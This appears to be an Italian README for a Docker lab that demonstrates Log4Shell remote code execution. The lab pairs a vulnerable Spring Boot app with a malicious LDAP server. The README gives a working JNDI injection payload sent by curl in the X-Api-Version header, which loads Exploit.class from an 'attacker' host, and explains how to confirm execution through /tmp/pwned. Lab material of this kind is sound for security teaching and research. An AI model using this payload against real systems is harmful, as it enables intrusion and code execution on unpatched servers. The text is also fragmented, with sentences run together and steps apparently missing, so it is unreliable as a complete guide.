
Demo di exploit RCE basata su Docker per Log4Shell (CVE-2021-44228) con app Spring Boot vulnerabile, server LDAP dannoso e consegna del payload tramite iniezione JNDI.
Questo progetto simula uno scenario di attacco RCE attraverso la vulnerabilità Log4Shell nella libreria Apache Log4j 2.
Exploit.class.Richiede Docker e Docker Compose installati.
docker compose up --build
Attendere che entrambi i container siano pronti. vulnerable-app sarà in esecuzione sulla porta 8080.
Aprire un nuovo terminale e inviare una richiesta contenente il payload JNDI tramite l'header X-Api-Version:
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/
vulnerable-app. Vedrai il messaggio del payload registrato.attacker. Vedrai la connessione LDAP reindirizzata al server HTTP./tmp/pwned è stato creato all'interno del container vulnerable-app:docker exec -it vulnerable-app ls -la /tmp/pwned
Se il file esiste, significa che il codice malevolo Exploit.class è stato eseguito con successo!
Questo progetto è destinato esclusivamente a fini didattici e di ricerca sulla sicurezza. Non utilizzarlo assolutamente per scopi illegali.